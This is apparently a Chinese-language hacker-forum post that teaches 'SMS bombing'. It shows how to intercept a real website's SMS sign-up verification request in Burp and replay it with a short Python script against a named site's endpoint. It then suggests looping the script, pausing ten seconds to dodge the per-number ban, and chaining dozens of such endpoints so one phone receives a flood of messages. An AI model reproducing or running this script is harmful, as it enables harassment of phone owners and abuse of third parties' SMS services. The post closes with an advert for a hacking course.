大家好,我是1ee(因為在作家群,就不加Hacker這個前綴了,怕被大佬打。。)
剛加入i春秋作家組希望大家多多關照,也歡迎大家找我交流
今天我來講講我最近找到的一個小思路,利用python進行短信轟炸
首先
這是一個網站,他的業務存在短信發送
這個時候,我們打開神器burp或者其他抓包工具(最好用burp,因為repeater模塊可以滿足我們的需要)
這時候我給我的火狐掛上代理,然后burp開啟攔截
抓到了一個包,發送到repeater
進入repeater分析數據包
{"mobile":"13xxxxxx","type":"signup"}
這個是發送的數據,go走起
看返回的包可以看到是成功的
然后開始寫我們的python進行循環發包對目標進行轟炸
import requests
import json
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer': 'http://www.demlution.com/'}
#data =
#print data
r = requests.post('/capi/v1/dmhome/send_token',data=json.dumps({"mobile":"手機號碼","type":"signup"}),headers=headers)
print(r.text)
先進行測試,測試完成后可以for循環加強腳本的威力,經過我的研究發現當一個號碼多次提交后會被ban,如我一次性發了10個包后(也就是發了十條短信)之后的這個號碼就不會再發了,即使返回的包狀態是成功,但是短信是發不到的,其實我們可以停頓十秒再發下一個,這樣就不會被ban,這也是測試知道的
好了,今天我就說道這吧,可能大家會說就一個號碼我直接加入黑名單就ok了,的確,但是我們可以挖掘這類型的網站,然后一個一個接口發送一次,60個接口,一秒鍾就60條短信,威力還是可以的,附上成功的圖片
>>>>>> 黑客入門必備技能 帶你入坑和逗比表哥們一起聊聊黑客的事兒,他們說高精尖的技術比農葯都好玩~